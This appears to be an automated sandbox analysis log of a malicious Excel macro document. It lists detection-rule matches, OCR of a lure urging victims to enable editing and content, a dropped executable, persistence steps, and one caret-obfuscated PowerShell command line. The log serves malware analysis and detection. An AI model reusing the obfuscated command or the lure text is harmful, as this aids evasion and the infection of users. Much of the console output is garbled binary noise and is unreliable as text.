      Source: dump.pcap, type: PCAPMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
      Source: 00000011.00000002.2156606049.000000000370B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
      Source: C:\Users\user\Documents\pd.bat, type: DROPPEDMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
      Source: Screenshot number: 4Screenshot OCR: document is protected. 20 21 :: 1. Open the document in Microsoft Office. Prev'ewir 24 25 work
      Source: Screenshot number: 4Screenshot OCR: protected documents. 26 27 2. If you downloaded this document from your email 28 29 Editing" fro
      Source: Screenshot number: 8Screenshot OCR: document is protected. 20 21 :: 1. Open the document in Microsoft Office. Prev'ewir 24 25 work
      Source: Screenshot number: 8Screenshot OCR: protected documents. 26 27 2. If you downloaded this document from your email 28 29 Editing" fro
      Source: Screenshot number: 12Screenshot OCR: document is protected. 21 :: 1. Open the document in Microsoft Office. Prev'ewir 24 25 work for
      Source: Screenshot number: 12Screenshot OCR: protected documents. 26 27 2. If you downloaded this document from your email 28 29 Editing" fro
      Source: Document image extraction number: 0Screenshot OCR: document is protected. 1. Open the document in Microsoft Office. Previewing online does not work f
      Source: Document image extraction number: 0Screenshot OCR: protected documents. 2. If you downloaded this document from your email, please click "Enable Edit
      Source: Document image extraction number: 0Screenshot OCR: Enable Content" on the yellow bar above.
      Source: Document image extraction number: 1Screenshot OCR: document is protected. 1. Open the document in Microsoft Office. Previewing online does not work f
      Source: Document image extraction number: 1Screenshot OCR: protected documents. 2. If you downloaded this document from your email, please click "Enable Edit
      Source: Document image extraction number: 1Screenshot OCR: Enable Content" on the yellow bar above.
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: ul9kpUwYel.xlsInitial sample: EXEC
      Found obfuscated Excel 4.0 MacroShow sources
      Source: ul9kpUwYel.xlsInitial sample: High usage of CHAR() function: 21
      Powershell drops PE fileShow sources
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\cr.exeJump to dropped file
      Source: C:\Users\user\AppData\Roaming\cr.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\cr.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00412EFA24_2_00412EFA
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0041339624_2_00413396
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0042576024_2_00425760
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0040B83124_2_0040B831
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00409D5224_2_00409D52
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0046415B24_2_0046415B
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0044217B24_2_0044217B
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_004141D024_2_004141D0
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_004181FE24_2_004181FE
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043620824_2_00436208
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0041C2ED24_2_0041C2ED
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_004242AB24_2_004242AB
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0044243624_2_00442436
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0040C49824_2_0040C498
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043C4AE24_2_0043C4AE
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_004365E124_2_004365E1
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0041A6B324_2_0041A6B3
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0040A75324_2_0040A753
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0044284024_2_00442840
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0045CA0D24_2_0045CA0D
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0044CCD824_2_0044CCD8
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00416D1524_2_00416D15
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0044CF0A24_2_0044CF0A
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043D00024_2_0043D000
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_004310FD24_2_004310FD
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_004350A724_2_004350A7
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0044D16F24_2_0044D16F
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0041930E24_2_0041930E
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_004275AA24_2_004275AA
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0040964F24_2_0040964F
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0041762524_2_00417625
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0042377824_2_00423778
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0046184224_2_00461842
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0041186E24_2_0041186E
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0044189824_2_00441898
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0045D92924_2_0045D929
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00413A8324_2_00413A83
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00441C0A24_2_00441C0A
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00419CEB24_2_00419CEB
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00417E6824_2_00417E68
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00449EC024_2_00449EC0
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00447EFA24_2_00447EFA
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00441EB424_2_00441EB4
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00459EB924_2_00459EB9
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00459FD924_2_00459FD9
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002880B824_2_002880B8
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002CA10924_2_002CA109
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002BA11024_2_002BA110
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002B814A24_2_002B814A
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0028314A24_2_0028314A
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002BD15A24_2_002BD15A
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002CA22924_2_002CA229
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002AD25024_2_002AD250
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002BD3BF24_2_002BD3BF
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0028442024_2_00284420
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002944FB24_2_002944FB
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0028C53D24_2_0028C53D
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002835E624_2_002835E6
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0027C6E824_2_0027C6E8
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002AC6FE24_2_002AC6FE
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0028787524_2_00287875
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0027989F24_2_0027989F
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0028A90324_2_0028A903
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0027A9A324_2_0027A9A3
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002939C824_2_002939C8
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00281ABE24_2_00281ABE
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0027BA8124_2_0027BA81
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002B2A9024_2_002B2A90
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002D1A9224_2_002D1A92
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002B1AE824_2_002B1AE8
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002CCC5D24_2_002CCC5D
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00283CD324_2_00283CD3
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002BCF2824_2_002BCF28
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00289F3B24_2_00289F3B
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00279FA224_2_00279FA2
      Source: ul9kpUwYel.xlsOLE indicator, VBA macros: true
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: String function: 002D76B0 appears 153 times
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: String function: 002BED89 appears 75 times
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: String function: 0027F4FF appears 176 times
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: String function: 002AFA10 appears 81 times
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: String function: 0040F2AF appears 181 times
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: String function: 0043F7C0 appears 82 times
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: String function: 002AFE70 appears 51 times
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: String function: 00467460 appears 172 times
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: String function: 0044EB39 appears 77 times
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: String function: 0043FC20 appears 61 times
      Source: sqlite3.dll.24.drStatic PE information: Number of sections : 18 > 10
      Source: cr.exe.23.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: cr.exe.23.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: ul9kpUwYel.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
      Source: dump.pcap, type: PCAPMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
      Source: 00000011.00000002.2156606049.000000000370B000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
      Source: C:\Users\user\Documents\pd.bat, type: DROPPEDMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
      Source: classification engineClassification label: mal100.spyw.expl.evad.winXLS@36/22@17/5
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00437BD1 __EH_prolog,CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,OpenProcessToken,DuplicateTokenEx,CloseHandle,GetModuleFileNameA,_strlen,_mbstowcs,CreateProcessWithTokenW,CloseHandle,Process32NextW,24_2_00437BD1
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043433D CoCreateInstance,24_2_0043433D
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\251F0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\cr.exeMutant created: \Sessions\1\BaseNamedObjects\dfthorbnjuser
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD29.tmpJump to behavior
      Source: ul9kpUwYel.xlsOLE indicator, Workbook stream: true
      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..).....................#.................F...............F.......A.....`IC........v.....................KJ.......).....l.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#................p.j....X|................T.............}..v.....|......0.................`.............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../.......V.'. .d.o.e.s. .n.o.t. .e.x.i.s.t...............}..v............0...............h.`.....$.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../................p.j......................T.............}..v.... .......0.................`.............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................0.......;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.7.T.............}..v....0....... ...............h.`.....".......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;................p.j......................T.............}..v....h.......0.................`.............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..).............y=.v....G...............{..j......`...............T.............}..v............0.................).............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G................p.j......................T.............}..v....0.......0.................`.............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..).............y=.v....S...............{..j......`...............T.............}..v....X.......0.................).....^.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S................p.j......................T.............}..v............0.................`.............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..).............y=.v...._...............{..j......`...............T.............}..v............0.................).....Z.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._................p.j....h.................T.............}..v............0.................`.............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..).............y=.v....k...............{..j......`...............T.............}..v............0.................).............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k................p.j....h.................T.............}..v............0.................`.............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w....... . . .I.t.e.m.C.o.m.m.a.n.d.......T.............}..v............0...............h.`.............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w................p.j....@.................T.............}..v............0.................`.............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ .......{..j......`...............T.............}..v....P.......0...............h.`.............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................p.j......................T.............}..v............0.................`.............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#.................F...............F.......A.....`IC........v.....................KJ.............r.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............[S.j.....r................T.............}..v.....s......0.................i.............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../.......V.'. .d.o.e.s. .n.o.t. .e.x.i.s.t...............}..v....(w......0...............H.i.....$.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../...............[S.j.....w................T.............}..v....`x......0.................i.............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.9.T.............}..v....p|......0...............H.i.....".......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;...............[S.j....(}................T.............}..v.....}......0.................i.............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G...............;P.j......i...............T.............}..v............0.......................`.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G...............[S.j......................T.............}..v............0.................i.............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S...............;P.j......i...............T.............}..v....0.......0.......................^.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S...............[S.j......................T.............}..v....h.......0.................i.............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._...............;P.j......i...............T.............}..v............0.......................`.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._...............[S.j....H.................T.............}..v............0.................i.............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k...............;P.j......i...............T.............}..v............0...............................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k...............[S.j....H.................T.............}..v............0.................i.............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w....... . . .o.c.a.t.i.o.n.C.o.m.m.a.n.d.T.............}..v............0...............H.i.....".......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w...............[S.j......................T.............}..v............0.................i.............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ .......;P.j......i...............T.............}..v............0...............H.i.............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................[S.j....X.................T.............}..v............0.................i.............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................................@{ .....................i^Q.......................$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J....................2..................J....Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................m.o.d.e........./................................$.J............/...............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ .1.8.,.1. ..............................\Q.....m.o.d.e..........D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: .........................................................................\Q.....m.o.d.e..........D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................................@{ .....................i^Q.......................$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................c.o.l.o.r......./................................$.J............/...............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ .F.E. ..................................\Q.....c.o.l.o..........D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: .........................................................................\Q.....c.o.l.o..........D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ........................................................................i^Q.......................$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J....................2..................J....Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................s.e.t.l.o.c.a.l./................................$.J............/...............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: .........................................................................\Q.....s.e.t.l..........D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ...................................................J....................i^Q.....`{.J..............$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................f.o.r...........`{.J.....................\Q.....X%.J.............D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ./.F...........`{.J.....................\Q.....X%.J.............D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ .".t.o.k.e.n.s.=.4.-.5. .d.e.l.i.m.s.=... ."...X%.J.............D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ .%.i. .i.n. ...=.4.-.5..................\Q.....X%.J.............D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................(.'.v.e.r.'.). .d.o. .5..................\Q.....X%.J.............D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................s.e.t...........d.o. .5..................\Q.....X%.J.............D$.............................x...............Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ .V.E.R.S.I.O.N.=.%.i...%.j. ............\Q.....s.e.t............D$.............X...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: .................................................D$......................\Q.....x................D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................................p.%......................QQ..............i$.....................H................i$.............Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J............x.......2..................J....Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................s.e.t............\%.......................$...............%........J....x.......X...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ .V.E.R.S.I.O.N.=.6...1. ................^Q.....s.e.t....i$.....................(................i$.............Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................................=.6...1..................^Q.....s.e.t....i$.....................(................i$.............Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................................`{.J....................i^Q......$.J..............$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................D...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J....................2..................J....Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................i.f. ...........`{.J.....................\Q.....X%.J.............D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................".6...1.". .=.=. .".1.0...0.". ..........\Q.....i.f. ............D$.............X....... .......................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................(................D$..................... .......x...............d1.......".v...............................J....Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: .........................................................................\Q.....(................D$.............X...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................e.c.h.o.........}..v....................|.......................................................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ .".W.i.n.d.o.w.s. .1.0. .d.e.t.e.c.t.e.d.". . .e.c.h.o..........D$.....................0.......................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ..... ..........D$......................\Q.....x................D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................r.e.g...........}..v....................|....................................................... ..... .........Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ..$.............D........................................................]Q.....r.e.g............D$...............$.............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................D...............1.>......................................]Q......................D$.............8...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................n.u.l. ..................................]Q......................D$.............8...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ..... .........d1......................y\Q......................D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................D...............t.i.m.e.o.u.t...}..v....................|...............3.......................8............... ..... .........Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................D............... ./.t. .2. . ............................]Q.....t.i.m.e..........D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................D...............1.>.....................................9]Q..... ./.t. ..........D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................D...............n.u.l. .................................9]Q..... ./.t. ..........D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................D............... ..... .........d1.......................]Q......................D$.............8...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................D...............s.c.h.t.a.s.k.s.}..v....................|.......D.......^....................................... ..... .........Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ..$.............D.......................................................i]Q.....s.c.h.t..........D$...............$.....v.......................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................D...............1.>......................................^Q......................D$.............x...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................D...............n.u.l. ..................................^Q......................D$.............x...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ..... .........d1......................9]Q......................D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................t.i.m.e.o.u.t...}..v....................|.......................................x............... ..... .........Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ./.t. .3. . ............................^Q.....t.i.m.e..........D$.............H...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................1.>......................................^Q..... ./.t. ..........D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................n.u.l. ..................................^Q..... ./.t. ..........D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ..... .........d1.......................^Q......................D$.............x...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................r.e.g...........d1.......................^Q......................D$.............x...............x...............Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ..$......................................................................^Q.....r.e.g............D$...............$.....T.......................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: .........................................................................\Q........J.............D$.............X...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................). ......................................\Q........J.............D$.............X...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: .................................................D$......................\Q.....x................D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................i.f. ...........`{.J.....................\Q.....X%.J.............D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................".6...1.". .=.=. .".6...3.". ............\Q.....i.f. ............D$.............X...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................(................D$.............................x...............d1.......".v...............................J....Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: .........................................................................\Q.....(................D$.............X...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................e.c.h.o.........}..v....................|.......................................................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ .".W.i.n.d.o.w.s. .8...1. .d.e.t.e.c.t.e.d.". . .c.h.o..........D$.....................2.......................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ..... ..........D$......................\Q.....x................D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................r.e.g...........}..v....................|....................................................... ..... .........Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ..$......................................................................]Q.....r.e.g............D$...............$.............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................1.>......................................]Q......................D$.............8...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................n.u.l. ..................................]Q......................D$.............8...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ..... .........d1......................y\Q......................D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................t.i.m.e.o.u.t...}..v....................|...............@.......................8............... ..... .........Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ..... .........d1.......................]Q......................D$.............8...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................s.c.h.t.a.s.k.s.}..v....................|...............f....................................... ..... .........Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ..$.....................................................................i]Q.....s.c.h.t..........D$...............$.....v.......................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................1.>......................................^Q......................D$.............x...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................n.u.l. ..................................^Q......................D$.............x...............................Jump to behavior
